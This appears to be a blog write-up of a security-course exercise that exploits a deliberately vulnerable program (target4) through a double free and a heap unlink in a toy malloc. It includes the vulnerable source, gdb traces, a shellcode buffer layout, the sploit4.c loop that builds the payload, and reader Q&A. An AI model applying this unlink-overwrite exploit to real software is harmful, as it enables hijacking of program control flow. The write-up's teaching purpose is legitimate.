Blog Bug's

bugging blogs

on Target 4…

Suggested readings :
Once upon a free()…
On Target 1

Examining /tmp/target4 in Detail

code of executable /tmp/target4 (tmalloc.h, tmalloc.c, and target4.c respectively) :

 * Trivial malloc() implementation
 * Inspired by K&R2 malloc() and Doug Lea malloc().

void *tmalloc(unsigned nbytes);
void tfree(void *vp);
void *trealloc(void *vp, unsigned newbytes);
void *tcalloc(unsigned nelem, unsigned elsize);
 * Trivial malloc() implementation
 * Inspired by K&R2 malloc() and Doug Lea malloc().

#include <string.h>

#ifdef NULL   /* these days, defined in string.h */
#undef NULL

#define NULL 0

 * the chunk header
typedef double ALIGN;

typedef union CHUNK_TAG
      union CHUNK_TAG *l;       /* leftward chunk */
      union CHUNK_TAG *r;       /* rightward chunk + free bit (see below) */
    } s;
  ALIGN x;

 * we store the freebit -- 1 if the chunk is free, 0 if it is busy --
 * in the low-order bit of the chunk's r pointer.

/* *& indirection because a cast isn't an lvalue and gcc 4 complains */
#define SET_FREEBIT(chunk) ( *(unsigned *)&(chunk)->s.r |=  0x1 )
#define CLR_FREEBIT(chunk) ( *(unsigned *)&(chunk)->s.r &= ~0x1 )
#define GET_FREEBIT(chunk) ( (unsigned)(chunk)->s.r & 0x1 )

/* it's only safe to operate on chunk->s.r if we know freebit
 * is unset; otherwise, we use ... */
#define RIGHT(chunk) ((CHUNK *)(~0x1 & (unsigned)(chunk)->s.r))

 * chunk size is implicit from l-r
#define CHUNKSIZE(chunk) ((unsigned)RIGHT((chunk)) - (unsigned)(chunk))

 * back or forward chunk header
#define TOCHUNK(vp) (-1 + (CHUNK *)(vp))
#define FROMCHUNK(chunk) ((void *)(1 + (chunk)))

/* for demo purposes, a static arena is good enough. */
#define ARENA_CHUNKS (65536/sizeof(CHUNK))
static CHUNK arena[ARENA_CHUNKS];

static CHUNK *bot = NULL;       /* all free space, initially */
static CHUNK *top = NULL;       /* delimiter chunk for top of arena */

static void init(void)
  bot = &arena[0]; top = &arena[ARENA_CHUNKS-1];
  bot->s.l = NULL; bot->s.r = top;
  top->s.l = bot;  top->s.r = NULL;

void *tmalloc(unsigned nbytes)
  CHUNK *p;
  unsigned size;

  if (bot == NULL)

  size = sizeof(CHUNK) * ((nbytes+sizeof(CHUNK)-1)/sizeof(CHUNK) + 1);

  for (p = bot; p != NULL; p = RIGHT(p))
    if (GET_FREEBIT(p) && CHUNKSIZE(p) >= size)
  if (p == NULL)
    return NULL;

  if (CHUNKSIZE(p) > size)      /* create a remainder chunk */
      CHUNK *q, *pr;
      q = (CHUNK *)(size + (char *)p);
      pr = p->s.r;
      q->s.l = p; q->s.r = pr;
      p->s.r = q; pr->s.l = q;
  return FROMCHUNK(p);

void tfree(void *vp)
  CHUNK *p, *q;

  if (vp == NULL)

  p = TOCHUNK(vp);
  q = p->s.l;
  if (q != NULL && GET_FREEBIT(q)) /* try to consolidate leftward */
      q->s.r      = p->s.r;
      p->s.r->s.l = q;
      p = q;
  q = RIGHT(p);
  if (q != NULL && GET_FREEBIT(q)) /* try to consolidate rightward */
      p->s.r      = q->s.r;
      q->s.r->s.l = p;

void *trealloc(void *vp, unsigned newbytes)
  void *newp = NULL;

  /* behavior on corner cases conforms to SUSv2 */
  if (vp == NULL)
    return tmalloc(newbytes);

  if (newbytes != 0)
      CHUNK *oldchunk;
      unsigned bytes;

      if ( (newp = tmalloc(newbytes)) == NULL)
        return NULL;
      oldchunk = TOCHUNK(vp);
      bytes = CHUNKSIZE(oldchunk) - sizeof(CHUNK);
      if (bytes > newbytes)
        bytes = newbytes;
      memcpy(newp, vp, bytes);

  return newp;

void *tcalloc(unsigned nelem, unsigned elsize)
  void *vp;
  unsigned nbytes;

  nbytes = nelem * elsize;
  if ( (vp = tmalloc(nbytes)) == NULL)
    return NULL;
  memset(vp, '\0', nbytes);
  return vp;
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include "tmalloc.h"

 * strlcpy() from OpenBSD-current:
 * $OpenBSD: strlcpy.c,v 1.5 2001/05/13 15:40:16 deraadt Exp $
 * Copy src to string dst of size siz.  At most siz-1 characters
 * will be copied.  Always NUL terminates (unless siz == 0).
 * Returns strlen(src); if retval >= siz, truncation occurred.
 * HINT: This come from OpenBSD; there is no buffer overflow within
 *       this function; the bug is somewhere else ...
static size_t
obsd_strlcpy(dst, src, siz)
        char *dst;
        const char *src;
        size_t siz;
        register char *d = dst;
        register const char *s = src;
        register size_t n = siz;

        /* Copy as many bytes as will fit */
        if (n != 0 && --n != 0) {
                do {
                        if ((*d++ = *s++) == 0)
                } while (--n != 0);

        /* Not enough room in dst, add NUL and traverse rest of src */
        if (n == 0) {
                if (siz != 0)
                        *d = '\0';              /* NUL-terminate dst */
                while (*s++)

        return(s - src - 1);    /* count does not include NUL */

int foo(char *arg)
  char *p;
  char *q;

  if ( (p = tmalloc(500)) == NULL)
      fprintf(stderr, "tmalloc failure\n");
  if ( (q = tmalloc(300)) == NULL)
      fprintf(stderr, "tmalloc failure\n");


  if ( (p = tmalloc(1024)) == NULL)
      fprintf(stderr, "tmalloc failure\n");

  obsd_strlcpy(p, arg, 1024);


  return 0;

int main(int argc, char *argv[])
  if (argc != 2)
      fprintf(stderr, "target4: argc != 2\n");

  return 0;

Neither overflow methods of sploit1 nor sploit2 will work on this case. By examining target4.c’s code, you will never find a local buf in any function that we hope to overflow and overwrite either the function-frame’s ebp or eip. On line 72 of target4.c, obsd_strlcpy(p, arg, 1024) suggests that we can construct a code like below, hoping to exploit the program above.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target4"

int main(void)
  char *args[3];
  char *env[1];
  char buf[1024];
  int i;
  int dummy_r, chnk_l, chnk_r;

  for(i = 0; i < 1024; i++) {
    if(i < 1023) {
      *(buf + i) = 'a';
    } else {
      *(buf + i) = '\x00';

  args[0] = TARGET; args[1] = buf; args[2] = NULL;
  env[0] = NULL;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;

What’s odd with the code (target4.c’s) is the call tfree(q) on line 74, without calling tmalloc() first for q and thus might provide some room for a bug. Using gdb to examine addresses especially of p and q, we will notice that q‘s address is within the address space of p (1024 bytes). p‘s start address is at 0x08049c48 (see line 52 below) and q‘s address is at 0x08049e48 (see line 58 below). p’s address space ranges from 0x08049c48 to 0x0804a047. Clearly, q is within that (p‘s) range and it (q) is 512 bytes from p.

user@box:~/pp1/sploits$ gdb -e sploit4 -s /tmp/target4
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) catch exec
Catchpoint 1 (exec)
(gdb) run
Starting program: /home/user/pp1/sploits/sploit4
Executing new program: /proc/3253/exe
/proc/3253/exe: Permission denied.
(gdb) break foo
Breakpoint 2 at 0x80484f4: file target4.c, line 54.
(gdb) break obsd_strlcpy
Breakpoint 3 at 0x804846a: file target4.c, line 24.
(gdb) break tfree
Breakpoint 4 at 0x80487fc: file tmalloc.c, line 103.
(gdb) continue
[New process 3253]
[Switching to process 3253]

Breakpoint 2, foo (arg=0xbffffbef 'a' ...) at target4.c:54
54	target4.c: No such file or directory.
	in target4.c
(gdb) info frame
Stack level 0, frame at 0xbffffa80:
 eip = 0x80484f4 in foo (target4.c:54); saved eip 0x8048668
 called by frame at 0xbffffaa0
 source language c.
 Arglist at 0xbffffa78, args: arg=0xbffffbef 'a' ...
 Locals at 0xbffffa78, Previous frame's sp is 0xbffffa80
 Saved registers:
  ebp at 0xbffffa78, eip at 0xbffffa7c
(gdb) continue

Breakpoint 4, tfree (vp=0x8049c48) at tmalloc.c:103
103	tmalloc.c: No such file or directory.
	in tmalloc.c
(gdb) continue

Breakpoint 4, tfree (vp=0x8049e48) at tmalloc.c:103
103	in tmalloc.c
(gdb) continue

Breakpoint 3, obsd_strlcpy (dst=0x8049c48 "", src=0xbffffbef 'a' ..., siz=1024) at target4.c:24
24	target4.c: No such file or directory.
	in target4.c
(gdb) continue

Breakpoint 4, tfree (vp=0x8049e48) at tmalloc.c:103
103	tmalloc.c: No such file or directory.
	in tmalloc.c

Another observation is that foo‘s frame is on address space 0xbffff*** range and with p‘s address space, i.e. 0x08049*** range, it (p) is too far to overflow like we used to in sploit1 or sploit2. We have to look for the bug somewhere else. tfree() is a good place to start with.

Examining tfree() in Detail

Lines 20 to 28 of tmalloc.c suggest that the structure of a chunk is :

[  -left-   ][  -right-  ][   -data-    ]
[xx|xx|xx|xx][xx|xx|xx|xx][00|... ...|00]  -> data
|--4 bytes--||--4 bytes--||---n bytes---|

Now on tfree() (lines 99 to 126) of tmalloc.c, the following lines (118, 121, and 122) are interesting :

  if (q != NULL && GET_FREEBIT(q)) /* try to consolidate leftward */
      q->s.r      = p->s.r;
      p->s.r->s.l = q;

Basically, the code above unlinks p from q (previous chunk) and updates all left and right links of affected chunks such that the previous next chunk of p becomes next chunk of q. A sample visualization is provided below. Take note that the right link of q, the last bit is 1 to satisfy GET_FREEBIT(q) as true, i.e. valid bytes are *1,*3, *5,*7,*9,*b,*d,*f.

### after, q != NULL && GET_FREEBIT(q) ###
...[  -left-   ][  -right-  ][   -data-    ]... ...[  -left-   ][  -right-  ][   -data-    ]... ...[  -left-   ][  -right-  ][   -data-    ]...
...[aaaaaa--                               ]... ...[bbbbbb--                               ]... ...[cccccc--                               ]...  -> address range
...[xx|xx|xx|xx][bb|bb|bb|b1][00|... ...|00]... ...[aa|aa|aa|xx][cc|cc|cc|xx][00|... ...|00]... ...[bb|bb|bb|xx][xx|xx|xx|xx][00|... ...|00]...  -> data
                      q                                               p                                               o

### after, q->s.r = p->s.r ###
...[  -left-   ][  -right-  ][   -data-    ]... ...[  -left-   ][  -right-  ][   -data-    ]... ...[  -left-   ][  -right-  ][   -data-    ]...
...[aaaaaa--                               ]... ...[bbbbbb--                               ]... ...[cccccc--                               ]...  -> address range
...[xx|xx|xx|xx][cc|cc|cc|xx][00|... ...|00]... ...[aa|aa|aa|xx][cc|cc|cc|xx][00|... ...|00]... ...[bb|bb|bb|xx][xx|xx|xx|xx][00|... ...|00]...  -> data
                      q                                               p                                               o

### after, p->s.r->s.l = q ###
...[  -left-   ][  -right-  ][   -data-    ]... ...[  -left-   ][  -right-  ][   -data-    ]... ...[  -left-   ][  -right-  ][   -data-    ]...
...[aaaaaa--                               ]... ...[bbbbbb--                               ]... ...[cccccc--                               ]...  -> address range
...[xx|xx|xx|xx][cc|cc|cc|xx][00|... ...|00]... ...[aa|aa|aa|xx][cc|cc|cc|xx][00|... ...|00]... ...[aa|aa|aa|xx][xx|xx|xx|xx][00|... ...|00]...  -> data
                      q                                               p                                               o

We can use this part of code to our advantage. Take note that p above is the actually q in target4.c since we called this function as tfree(q) on target4.c. Remember that actual q in target4.c is within actual p‘s (in target4.c) address space and when we call obsd_strclpy(p, arg, 1024) to overwrite bytes on p, we can overwrite left and right links of actual q. The idea is to let actual q’s (p in tfree()) right link to point to foo-frame’s eip and its (q‘s) left link to actual p (in target4.c, and also start of buffer). In this way, we can overwrite effectively foo-frame’s eip with p which is also the start of buffer.

Let’s use gdb again to examine foo‘s frame, addresses of p & q, and try to construct our buffer.

user@box:~/pp1/sploits$ gdb -e sploit4 -s /tmp/target4
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) catch exec
Catchpoint 1 (exec)
(gdb) run
Starting program: /home/user/pp1/sploits/sploit4
Executing new program: /proc/3345/exe
/proc/3345/exe: Permission denied.
(gdb) break foo
Breakpoint 2 at 0x80484f4: file target4.c, line 54.
(gdb) break tfree
Breakpoint 3 at 0x80487fc: file tmalloc.c, line 103.
(gdb) continue
[New process 3345]
[Switching to process 3345]

Breakpoint 2, foo (arg=0xbffffbef 'a' <repeats 200 times>...) at target4.c:54
54	target4.c: No such file or directory.
	in target4.c
(gdb) info frame
Stack level 0, frame at 0xbffffa80:
 eip = 0x80484f4 in foo (target4.c:54); saved eip 0x8048668
 called by frame at 0xbffffaa0
 source language c.
 Arglist at 0xbffffa78, args: arg=0xbffffbef 'a' <repeats 200 times>...
 Locals at 0xbffffa78, Previous frame's sp is 0xbffffa80
 Saved registers:
  ebp at 0xbffffa78, eip at 0xbffffa7c
(gdb) x 0xbffffa70
0xbffffa70:	0xb7f9da09
(gdb) x 0xbffffa74
0xbffffa74:	0x08049bd4
(gdb) x 0xbffffa78
0xbffffa78:	0xbffffa98
(gdb) x 0xbffffa7c
0xbffffa7c:	0x08048668
(gdb) x 0xbffffa80
0xbffffa80:	0xbffffbef
(gdb) continue

Breakpoint 3, tfree (vp=0x8049c48) at tmalloc.c:103
103	tmalloc.c: No such file or directory.
	in tmalloc.c
(gdb) continue

Breakpoint 3, tfree (vp=0x8049e48) at tmalloc.c:103
103	in tmalloc.c
(gdb) continue

Breakpoint 3, tfree (vp=0x8049e48) at tmalloc.c:103
103	in tmalloc.c

A visualization of foo‘s frame :

[     -local_var-       ][   -ebp-   ][   -eip-   ][ -params-  ]
[bffffa--               ][bffffa--   ][bffffa--   ][bffffa--   ]  -> first 3 bytes of addresses
[70|71|72|73|74|75|76|77][78|79|7a|7b][7c|7d|7e|7f][80|81|82|83]  -> last bytes of addresses
[09|da|f9|b7|d4|9b|04|08][98|fa|ff|bf][68|86|04|08][ef|fb|ff|bf]  -> data

A visualization of our buffer (note the use of jmp (eb) instruction since <fake_right> is not a valid assembly instruction, we should skip those bytes) :

[   left    |   right   ][data...             ][   left    |   right   ][data...        ]
[90|90|eb|03|xx|xx|xx|x1][90|...              ][48|9c|04|08|7c|fa|ff|bf][xx|...   ...|00] -> buffer
[<fill><jmp>|<fake_rght>][<nop>... <shellcode>][<left>...  |<right>... ][<filler>... |00]
|-----------------------------512 bytes--------------------------------|
|---------------------------------------1024 bytes--------------------------------------|

to implement, below is a sample edit of the for loop in sploit4.c :

  chnk_l = 0x08049c48;
  chnk_r = 0xbffffa7c;
  dummy_r = chnk_r + 1;
  for(i = 0; i < 1024; i++) {
    if(i < 2) {
      *(buf + i) = '\x90'; // <filler>
    } else if(i < 4) {
      memcpy((buf + i),"\xeb\x03",2); // <jump>
    } else if(i < 8){
      *(buf + i) = dummy_r >> ((i - 4) * 8); // <fake right>
    } else if(i < (504 - strlen(shellcode))){
      *(buf + i) = '\x90'; // <nop>
    } else if(i < 504) {
      *(buf + i) = shellcode[i - 504 + strlen(shellcode)]; // <shellcode>
    } else if(i < 508) {
      *(buf + i) = chnk_l >> ((i - 504) * 8); // <left>
    } else if(i < 512) {
      *(buf + i) = chnk_r >> ((i - 508) * 8); // <right>
    } else if(i < 1023) {
      *(buf + i) = '\x90'; // <filler>
    } else {
      *(buf + i) = '\x00'; // terminate with null
posted by ninoy in Hack 101 and have Comments (14)

14 Responses to “on Target 4…”

  1. Josh says:

    Where does eb come from in the jump(eb)?

  2. ninoy says:

    eb is the hex for jump(jmp) instruction. the next byte corresponds to the number of bytes to skip(jump) and continue next code instruction.

  3. Catie says:

    More than a year now, but I hope you read this. I don’t understand why there is a dummy_r and a jump instruction required? Could you please explain?

  4. Catie says:

    The address space that p points to is a memory address for function arena(), and I am seg-faulting in that function as esp is not declared. Not sure how to work around this?

  5. ninoy says:

    for `dummy_r` you need to carefully craft it, so that it will satisfy this condition `q != NULL && GET_FREEBIT(q)` before these lines:
    q->s.r = p->s.r;
    p->s.r->s.l = q;
    get executed. furthermore, the last bit of `dummy_r` should be equal to `1` to get `GET_FREEBIT(q)` return true.

    for `jump` instruction, its optional as long as `dummy_r` happens to be a valid instruction code. remember the start of chunk is:
    |xx xx jmp|dummy_r|nop…|
    to save you time of thinking a valid instruction code and value for dummy_r and also whose last bit is 1, `jmp` is needed to jump over the dummy_r bytes which may not be a valid instruction code (but still the last bit (dummy_r) should be 1).

  6. bob says:

    shouldn’t it be jump 4?

  7. ninoy says:

    right, the safest is jump 4 (\xeb\x04). but i remember the exploit works using jump 3. maybe, the last byte of dummy_r was a valid instruction code.

  8. Davy says:

    Hello ninoy, i didn’t still understand the attack fully. Ok, we added fake chunk inside p (1024), and there is q inside its address space after some offset (512). So we add FD, BK (right, left) links as well each is 4 bytes, into our fake chunk, and data. Also our p’s left link has jmp instruction which jumps to p’s data, which contains shellcode.

    Question is what happens when we call tfree(q), according to doc it should try to link, unlink our fake chunk’s predecessor chunk with fake chunk’s successor chunk. So fake chunk will be freed ?
    We linked our fake chunk’s left to p’s start address and fake chunk’s right to eip of foo(). What happens if we link? Why shellcode is executed and when, for what reason?
    Last what happened to prev_size and size of chunk? we have never considerem them, on article ( it is shown there is 8 byte size location before left, right link?

    I made code working with “\xeb\x04” above, but can’t connect pieces in my mind. Help needed Asap, i summon you master 🙂

  9. ninoy says:

    hi davy,

    the explanation is pretty much detailed above. i suggest you take time and be patient. reread the steps line by line, somewhere near the ff:

    if (q != NULL && GET_FREEBIT(q)) /* try to consolidate leftward */
    q->s.r = p->s.r;
    p->s.r->s.l = q;

    on Examining tfree() in Detail section. try getting paper and pencil and do the logic by hand. 🙂

    below, fake chunk is p. o chunk is somewhere in the address space that coincides with eip of foo().
    notice o‘s address should be the same as fake chunk’s (p‘s) right link.

    ### after, q != NULL && GET_FREEBIT(q) ###
    ...[ -left- ][ -right- ][ -data- ]... ...[ -left- ][ -right- ][ -data- ]... ...[ -left- ][ -right- ][ -data- ]...
    ...[aaaaaa-- ]... ...[bbbbbb-- ]... ...[cccccc-- ]... -> address range
    ...[xx|xx|xx|xx][bb|bb|bb|b1][00|... ...|00]... ...[aa|aa|aa|xx][cc|cc|cc|xx][00|... ...|00]... ...[bb|bb|bb|xx][xx|xx|xx|xx][00|... ...|00]... -> data
    q p o

    below, notice eip of foo()‘s address is copied to right link of chunk q.

    ### after, q->s.r = p->s.r ###
    ...[ -left- ][ -right- ][ -data- ]... ...[ -left- ][ -right- ][ -data- ]... ...[ -left- ][ -right- ][ -data- ]...
    ...[aaaaaa-- ]... ...[bbbbbb-- ]... ...[cccccc-- ]... -> address range
    ...[xx|xx|xx|xx][cc|cc|cc|xx][00|... ...|00]... ...[aa|aa|aa|xx][cc|cc|cc|xx][00|... ...|00]... ...[bb|bb|bb|xx][xx|xx|xx|xx][00|... ...|00]... -> data
    q p o

    below and finally, address of chunk q is copied to right link of chunk o (eip of foo()).

    ### after, p->s.r->s.l = q ###
    ...[ -left- ][ -right- ][ -data- ]... ...[ -left- ][ -right- ][ -data- ]... ...[ -left- ][ -right- ][ -data- ]...
    ...[aaaaaa-- ]... ...[bbbbbb-- ]... ...[cccccc-- ]... -> address range
    ...[xx|xx|xx|xx][cc|cc|cc|xx][00|... ...|00]... ...[aa|aa|aa|xx][cc|cc|cc|xx][00|... ...|00]... ...[aa|aa|aa|xx][xx|xx|xx|xx][00|... ...|00]... -> data
    q p o

    So fake chunk will be freed ?
    – no. what get’s freed (i.e. undergoing the tfree() call) is chunk q above.

    What happens if we link?
    – reexplained on this reply. note that linking is just copying of chunk addresses among chunks’ left and/or right links.

    Why shellcode is executed and when, for what reason?
    – it’s basic. program flow executes anything on the address inside any eip (chunk o for this case) of a function call.

    Last what happened to prev_size and size of chunk?
    – we don’t need it for this case. the article is just a guide. it just so happened that we can do the attack without needing to consider prev_size and size of chunk. it depends on the gnu c library implementation.

  10. Davy says:

    I see. If we assume we have sth like this [q [p] ][o] , and we assign p->left to q and p->right to eip of foo() :

    By this “q = p->s.l;” i get get q from p->left which we did intentionally.

    By this “q->s.r = p->s.r;” i point q->right to eip of foo(), which is not important i think, since i jump q->right when executing.

    By this “p->s.r->s.l = q;” i change eip of foo()’s content! to address of q which our code resides.

    Also we are using our tmalloc(), tfree() impl. we don’t consider prev_size, size. 🙂 Thanks

    (I am not still sure how eip of foo() can be chunk as well, since we are trying to change eip of foo()’s left to be q here: “p->s.r->s.l = q;)

  11. ninoy says:

    `I am not still sure how eip of foo() can be chunk as well, since we are trying to change eip of foo()’s left to be q here: “p->s.r->s.l = q;`
    – why? look at the a visualization of foo‘s frame section. it’s basic and also explained, review your frames on called functions.

    [ -local_var- ][ -ebp- ][ -eip- ][ -params- ]
    [bffffa-- ][bffffa-- ][bffffa-- ][bffffa-- ] -> first 3 bytes of addresses
    [70|71|72|73|74|75|76|77][78|79|7a|7b][7c|7d|7e|7f][80|81|82|83] -> last bytes of addresses
    [09|da|f9|b7|d4|9b|04|08][98|fa|ff|bf][68|86|04|08][ef|fb|ff|bf] -> data

    chunks q, p and o are actually on the same overflow buffer. this will be copied to one of foo()‘s local variables (i.e. char *p) on obsd_strlcpy() call.

    [ left | right ][data... ][ left | right ][data... ]
    [90|90|eb|04|xx|xx|xx|x1][90|... ][48|9c|04|08|7c|fa|ff|bf][xx|... ...|00] -> buffer
    [|][... ][... |... ][... |00]
    |-----------------------------512 bytes--------------------------------|
    |---------------------------------------1024 bytes--------------------------------------|

  12. Davy says:

    Why do we do “dummy_r = chnk_r + 1;dummy_r = chnk_r + 1;”, i think we don’t execute this step, since we jump it with [90|90|eb|04] ?

  13. Davy says:

    Ow i see GET_FREEBIT(q), thats why last bit should be 1

  14. ninoy says:

    yes. last bit should be 1 to satisfy the if condition and will execute the unlinking-linking routine on tfree().

    if (q != NULL && GET_FREEBIT(q))

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